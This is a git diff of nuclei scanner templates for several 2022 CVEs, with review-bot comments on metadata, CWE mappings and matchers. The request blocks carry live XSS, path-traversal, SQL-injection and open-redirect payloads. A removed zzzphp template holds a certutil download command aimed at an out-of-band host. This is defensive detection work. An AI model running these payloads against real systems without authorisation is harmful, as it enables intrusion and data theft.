reference: - https://nvd.nist.gov/vuln/detail/cve-2022-23102 - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html - https://seclists.org/fulldisclosure/2022/Feb/20 - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23102 cwe-id: CWE-601 + epss-score: 0.00366 + epss-percentile: 0.71925 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 + vendor: siemens + product: sinema_remote_connect_server shodan-query: title:"Logon - SINEMA Remote Connect" - tags: cve,cve2022,redirect,sinema + tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens http: - - method: GET - path: - - "{{BaseURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh" + - raw: + - | + GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 + Host: {{Hostname}} + - | + POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: csrftoken={{csrf}}; + Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh + + csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}} matchers: - type: regex - part: header + part: header_2 regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - "name='csrfmiddlewaretoken' value='(.*)' />" + internal: true +# digest: 490a0046304402203cad78aaff543175f5e30153ca01cb6d6a88448ec822dc9559ed8b13434d6e9c022002833237d916abd0bcc7d2263671711bfe6b01b5fdaf5564e962070a75d71045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
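Review bot: The new POST request interpolates `{{username}}` and `{{password}}`, but nothing in the template declares or documents these variables, so the template only works when the operator supplies them (for example with nuclei's `-var`), and the `authenticated` tag is the only hint of that. Add a comment above the `http:` block, e.g. `# second request logs in with operator-supplied credentials: pass -var username=... -var password=...`, so the requirement is visible without reading the raw request. The `csrf` extractor is internal and feeds both the `Cookie` and the form field of request 2, which is fine, but the `part: header_2` matcher means request 1 alone never matches; a short comment stating that the redirect is only confirmed post-login would document why `max-request` went to 2.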
diff --git a/nuclei-templates/CVE-2022/CVE-2022-2314.yaml b/nuclei-templates/CVE-2022/CVE-2022-2314.yaml
index 83a7fe1900..04b41916be 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-2314.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-2314.yaml
@@ -1,34 +1,45 @@ id: CVE-2022-2314 info: - name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call + name: WordPress VR Calendar <=2.3.2 - Remote Code Execution author: theamanrawat severity: critical description: | - The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site. + WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. + remediation: | + Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82 - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2314 + cwe-id: CWE-78,NVD-CWE-noinfo + epss-score: 0.26874 + epss-percentile: 0.96341 + cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin + verified: true + max-request: 2 + vendor: vr_calendar_project + product: vr_calendar + framework: wordpress + tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project -requests: +http: - raw: - | GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: - 
type: word @@ -46,3 +57,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402206692348e2633018a23d148415e047563294843e45c7b5ee7d28a232472ccfa8a0220754a5291e01ce0d4ea4c998c533782d53abed0b92402761dd3c6984b8e34ac71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23348.yaml b/nuclei-templates/CVE-2022/CVE-2022-23348.yaml index 6eee2fa3a0..9e7bd3de0f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23348.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23348.yaml @@ -6,21 +6,31 @@ info: severity: medium description: | BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the access control issue. reference: - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348 - http://bigant.com - https://nvd.nist.gov/vuln/detail/CVE-2022-23348 + - https://www.bigantsoft.com/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-23348 cwe-id: CWE-916 + epss-score: 0.00425 + epss-percentile: 0.71717 + cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: bigantsoft + product: bigant_server shodan-query: http.html:"bigant" - verified: "true" - tags: cve,cve2022,bigant,unauth,exposure + tags: cve,cve2022,bigant,unauth,exposure,bigantsoft -requests: +http: - method: GET path: - "{{BaseURL}}/Runtime/Data/ms_admin.php" 
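Review bot: The new `cwe-id: CWE-78,NVD-CWE-noinfo` includes `NVD-CWE-noinfo`, which is NVD's placeholder for "no CWE assigned" rather than a weakness identifier, so it adds no information and will confuse tooling that parses this field; `cwe-id: CWE-78` is enough. CWE-78 (OS command injection) also sits uneasily with the description, which says the plugin lets any user call arbitrary PHP functions — arguably a code-injection class — so it may be worth confirming the mapping against the NVD entry before keeping it. The `req-condition: true` line was dropped while the matchers it may have governed are outside this hunk; if they reference per-request parts (`body_1`, `body_2`) that should be re-checked. The matcher list continues past the end of the hunk.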
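Review bot: The added `remediation` for CVE-2022-23348 only says to apply vendor patches, while the request below fetches `/Runtime/Data/ms_admin.php` directly, so the practical interim control is a web-server rule denying external access to the `Runtime/Data` directory; stating that alongside the patch advice makes the entry actionable for defenders, e.g. `remediation: | Apply vendor updates; until then, block web access to the Runtime/Data directory that exposes ms_admin.php.` The context description still carries the typos "utililizes" and "possibly possibly" and could be fixed in the same touch. The matchers for this request are outside the hunk.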
@@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100cc5a1e9ab10a42df26c83f3bba3e5577c2c8cfe4b97d834eba3461a9745d8f2d022100c9eba2a9ce77b634e7a4f2af4a07997e509bbc86520f70968b5457b7f55aa102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23544.yaml b/nuclei-templates/CVE-2022/CVE-2022-23544.yaml index 20bc5f1274..f24c78cefe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23544.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: @@ -17,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23544 - cwe-id: CWE-79,CWE-918 - epss-score: 0.00059 - epss-percentile: 0.23236 + cwe-id: CWE-918,CWE-79 + epss-score: 0.00083 + epss-percentile: 0.34435 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" 
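Review bot: The new `impact` text for CVE-2022-23544 describes only the SSRF side ("send crafted requests to internal resources"), although the description it follows states the SSRF chains into a reflected XSS in MeterSphere's origin and the later tags hunk adds `xss`; the impact should cover both, e.g. `An attacker can reach internal resources through the server and, via the reflected XSS, run script in the context of MeterSphere's origin for a victim user.` Keeping impact consistent with the tags matters because downstream reporting often shows only the impact line.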
@@ -28,7 +30,7 @@ info: product: metersphere shodan-query: html:"metersphere" fofa-query: title="MeterSphere" - tags: cve,cve2022,metersphere,ssrf,oast + tags: cve2022,cve,metersphere,ssrf,oast,xss http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb923b2cef39dd9a412348743653997bbede51b8c74d8907e12085c7fd49c739022078ef50eb5602b883f8b01f2e13840d40f566dcb430142e65c7423a438d53a3d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c5b2eb5590a975c3168c5bf10ecafe306c4717f4461655b26d62aef269d5f3602207433e872a215f20e193af9adca4050f730dde0a9a36d95ba76a624d43780047a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2373.yaml b/nuclei-templates/CVE-2022/CVE-2022-2373.yaml index 7b32cc054a..1da0b22d07 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2373.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2373.yaml 
@@ -1,42 +1,56 @@ id: CVE-2022-2373 info: - name: Simply Schedule Appointments < 1.5.7.7 - Email Address Disclosure + name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure author: theamanrawat,theabhinavgaur severity: medium description: | - The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. + WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. + remediation: | + Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 + epss-score: 0.00292 + epss-percentile: 0.68538 + cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp + verified: true + max-request: 1 + vendor: nsqua + product: simply_schedule_appointments + framework: wordpress + tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua -requests: +http: - method: GET path: - "{{BaseURL}}/wp-json/ssa/v1/users" matchers-condition: and matchers: + - type: word + part: header + 
words: + - application/json + - type: regex regex: - 'response_code":200' - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' condition: and - - type: word - part: header - words: - - application/json - - type: status status: - 200 +# digest: 4a0a00473045022100b940545db7a1a8e51cb87f781d4b9f7ff7bdb733dc9e3e9655204af3837f5bba02200e130cc811f3149c5dadcd9d423811fc7ad8ca0528144218ddec9b6af10fc4af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2376.yaml b/nuclei-templates/CVE-2022/CVE-2022-2376.yaml index a06ad6605c..4ae33db0af 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2376.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2376.yaml 
@@ -1,23 +1,35 @@ id: CVE-2022-2376 info: - name: Directorist < 7.3.1 - Unauthenticated Email Address Disclosure + name: WordPress Directorist <7.3.1 - Information Disclosure author: Random-Robbie severity: medium - description: The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users + description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. + impact: | + An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. + remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 - remediation: Fixed in version 7.3.1 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure + epss-score: 0.04177 + epss-percentile: 0.92016 + cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: wpwax + product: directorist + framework: wordpress + tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination' @@ -39,3 +51,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100cb70d03524416c4cc1af8cff5314a511b64abcf5e9026d7dbdb016fba5ddeda0022021c8dcef9f3fad8ea0d0eb19aa59daf7ce4f6d281296bc4b869f297db54aab20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
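Review bot: `remediation: Fixed in version 7.3.1.` is a statement of fact rather than the instruction the other templates in this commit give, and it was simply moved out from under `reference` where it was previously misplaced; phrase it as an action, `remediation: Update the Directorist plugin to version 7.3.1 or later.` The rest of the entry (impact, cpe, metadata) reads consistently with the description.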
diff --git a/nuclei-templates/CVE-2022/CVE-2022-2379.yaml b/nuclei-templates/CVE-2022/CVE-2022-2379.yaml index 096d9efc33..61238c3033 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2379.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2379.yaml @@ -1,11 +1,15 @@ id: CVE-2022-2379 info: - name: Easy Student Results <= 2.2.8 - Information Disclosure + name: WordPress Easy Student Results <=2.2.8 - Improper Authorization author: theamanrawat severity: high description: | - The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc. + WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number. + impact: | + An attacker can gain access to sensitive student information, potentially compromising their privacy and security. + remediation: | + Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability. reference: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ 
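Review bot: The new `remediation` for CVE-2022-2379 tells users to update to "(2.2.8)", but the new `name` (`<=2.2.8`) and the description ("through 2.2.8") both say 2.2.8 is itself affected, so the advice points at a vulnerable release. Unless the fixed version is confirmed from the wpscan reference, write it without a number: `Update the Easy Student Results plugin to a release later than 2.2.8 that restores authorization on its REST API (see the wpscan advisory), or disable the plugin.` The classification and request blocks of this template sit in the following hunks.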
@@ -15,22 +19,28 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 + epss-score: 0.01934 + epss-percentile: 0.87376 + cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022 + verified: true + max-request: 2 + vendor: easy_student_results_project + product: easy_student_results + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project -requests: +http: - raw: - | GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1 Host: {{Hostname}} - - | GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true - req-condition: true + matchers-condition: and matchers: - type: word @@ -56,3 +66,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100e1f2b124c765614d3ab35ff74edf5bbb68b70131be4b3b60a91c089395bc21a802200331ef6a4224f062eb1af5715667a63cb2fbc4407cd604a4a3dc649f383eef79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml b/nuclei-templates/CVE-2022/CVE-2022-23808.yaml deleted file mode 100644 index b174bac40d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2022-23808 - -info: - name: phpMyAdmin < 5.1.2 - Cross-Site Scripting - author: cckuailong,daffainfo - severity: medium - description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. - reference: - - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - - https://github.com/dipakpanchal456/CVE-2022-23808 - - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 - - https://www.phpmyadmin.net/security/PMASA-2022-2/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-23808 - cwe-id: CWE-79 - metadata: - verified: true - shodan-query: http.component:"phpmyadmin" - tags: cve,cve2022,phpmyadmin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "\">" - - "

Add a new server

" - - "phpMyAdmin setup" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2383.yaml b/nuclei-templates/CVE-2022/CVE-2022-2383.yaml index 121112e33d..57f57cb54d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2383.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2383.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ 
@@ -15,11 +19,33 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45893 + cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss + verified: true + max-request: 1 + vendor: slickremix + product: feed_them_social + framework: wordpress + tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Feed Them Social' + - 'Tags:' + condition: and -requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E' @@ -39,5 +65,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022007c261c3ec560f291c2c68c92b556242e52fb67a3f9daa340a1f02f9b9b3091802204fccfa62735961d779929f897049f006dae4f29bcf27a5e66c59bc53889f2607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23854.yaml b/nuclei-templates/CVE-2022/CVE-2022-23854.yaml index 431dfc7406..f85f68fd1d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23854.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23854.yaml @@ -6,6 +6,10 @@ info: severity: high description: | AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. + remediation: | + Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 - https://www.aveva.com 
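Review bot: `max-request: 1` is wrong for the new shape of CVE-2022-2383: the `flow: http(1) && http(2)` now issues the readme GET plus the `admin-ajax.php` GET, so the value should be `max-request: 2`. The readme gate only matches `Feed Them Social` and `Tags:`, which confirms the plugin is present but not that it is below 3.0.1, so the second request still runs against patched sites; if the readme's version line is reliable, a version comparison on it (or a comment explaining why that was not done) would make the gate tighter. The matchers of the second request are outside this hunk.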
@@ -16,13 +20,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-23854 - cwe-id: CWE-23 + cwe-id: CWE-22,CWE-23 + epss-score: 0.66314 + epss-percentile: 0.97841 + cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: aveva + product: intouch_access_anywhere shodan-query: http.html:"InTouch Access Anywhere" - verified: "true" - tags: lfi,packetstorm,cve,cve2022,aveva,intouch + tags: cve,cve2022,lfi,packetstorm,aveva,intouch -requests: +http: - method: GET path: - "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini" @@ -30,6 +40,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'for 16-bit app support' - 'extensions' @@ -38,10 +49,11 @@ requests: - type: word part: header words: - - EricomSecureGateway + - 'text/ini' + - 'application/octet-stream' + condition: or - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402203ba9de7758c76694c9619b5b90dc1c5aad849e1e881d89f2fcb805ccd73226cf0220771816d83704155d2db5ac2473fcafb8e0175c8d3897d0457d88af07cbf5500e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml deleted file mode 100644 index 84b802eba2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml +++ /dev/null 
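Review bot: The header matcher for CVE-2022-23854 no longer looks for the `EricomSecureGateway` banner and instead accepts `text/ini` or `application/octet-stream`, which are generic content types; product identification now rests on the `win.ini` body words and the `shodan-query` metadata alone. If the banner was dropped because some affected gateway builds do not send it, a comment such as `# banner check removed: not all affected builds return EricomSecureGateway` above the header matcher would stop the next maintainer from reinstating it. The newly added `part: body` on the first word matcher is a good tightening and should be kept.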
@@ -1,35 +0,0 @@ -id: CVE-2022-23881 - -info: - name: zzzphp v2.1.0 RCE - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - tags: cve,cve2022,rce,zzzphp,zzzcms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23898.yaml b/nuclei-templates/CVE-2022/CVE-2022-23898.yaml index 5b537970c0..23123219c9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23898.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23898.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. reference: 
@@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23898 cwe-id: CWE-89 - epss-score: 0.02852 - epss-percentile: 0.8963 + epss-score: 0.0161 + epss-percentile: 0.87161 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms + tags: cve,cve2022,sqli,mcms,mingsoft variables: num: "999999999" @@ -45,4 +47,4 @@ http: part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' -# digest: 4a0a004730450221009461fb4908d89a3a30716a3869ba45ec3b77c43067bfefaeca087929a6bd7cac02206c6d9453891af80f199dc5e623b40a6798b1df14ef21de003bcc388566749d26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc573519d97c7e33cb54d6edce45a40fcdb95812ec7800e929a9205d5685fc690221008936ca5aa6d12794cfd449ed310894bcd2cc70e038d631c3e29d6f0157b4b92e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml index 8fce813a89..830928fc23 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml 
@@ -3,19 +3,32 @@ id: CVE-2022-23944 info: name: Apache ShenYu Admin Unauth Access author: cckuakilong - severity: medium - description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1." + severity: critical + description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel. remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md + - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y + - http://www.openwall.com/lists/oss-security/2022/01/25/15 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 cve-id: CVE-2022-23944 - cwe-id: CWE-862 + cwe-id: CWE-306,CWE-862 